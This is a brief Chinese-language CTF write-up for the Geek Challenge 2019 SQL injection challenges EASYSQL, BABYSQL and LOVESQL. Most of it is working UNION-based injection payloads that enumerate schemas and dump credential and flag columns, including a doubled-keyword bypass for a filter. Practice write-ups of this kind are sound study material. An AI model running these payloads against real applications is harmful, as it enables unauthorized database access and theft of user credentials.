极客大挑战2019-SQL注入
SQL注入的第一步就是查找注入点
EASYSQL
加#测试注入点是否为1'
确定注入点为1',使用order by 查看行数,但不知道为什么在union select 1,2,3# 的时候就爆flag了
或者我们还能用1' or 1=1#
BABYSQL1
第一步还是确定注入点为1',尝试后发现
1' uniounionn selecselectt 1,2,database()#
1' uniounionn selecselectt 1,2,group_concat(table_name) frofromm infoorrmation_schema.tables wherwheree table_schema=database()#
1' uniounionn selecselectt 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_schema=database()#
不知道为啥出现了六个字段
对geekuser表:
1' uniounionn selecselectt 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name='geekuser'#
对b4bsql表:
1' uniounionn selecselectt 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wherwheree table_name='b4bsql'#
回显均为:
Hello 2!
Your password is 'id,username,password'
这就解释了上面第一次的代码为什么回显了三次‘id,username,password’
1' uniounionn selecselectt 1,2,group_concat(passwoorrd) frofromm b4bsql#
获得flag
LOVESQL1
这道题是最普通的一类
我们确定完注入点为1'后,使用order by确定,然后使用联合注入即可
1' union select 1,2,3 #
1' union select 1,2,database() #
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'#
1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'#
1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1#最后可以发现flag
1242
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
